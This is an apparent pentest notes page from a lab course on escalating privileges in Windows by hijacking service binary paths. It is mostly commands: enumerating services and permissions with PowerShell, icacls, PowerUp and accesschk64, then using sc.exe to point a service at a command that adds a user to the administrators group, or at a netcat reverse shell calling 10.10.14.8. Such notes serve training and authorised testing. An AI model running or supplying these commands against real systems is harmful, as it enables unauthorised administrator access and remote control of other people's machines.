Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation via Powershell

View services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

View permissions

icacls "C:\xampp\apache\bin\mysqld.exe"
Mask
Permissions

F

Full access

M

Modify access

RX

Read and execute access

R

Read-only access

W

Write-only access

Replace service binary with malicious one then restart service

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
net stop mysql
net start mysql
shutdown /r /t 0

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks
TCM Windows Priv Esc on Try Hack Me

Change the binary path

sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc.exe start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *
TCM Windows Priv Esc on Try Hack Me
accesschk64.exe -uwcv daclsvc
TCM Windows Priv Esc on Try Hack Me

Query the service

sc qc daclsvc
TCM Windows Priv Esc on Try Hack Me

Changing the binary path is the same as the last method

PreviousService PermissionsNextUnquoted Service Paths

Last updated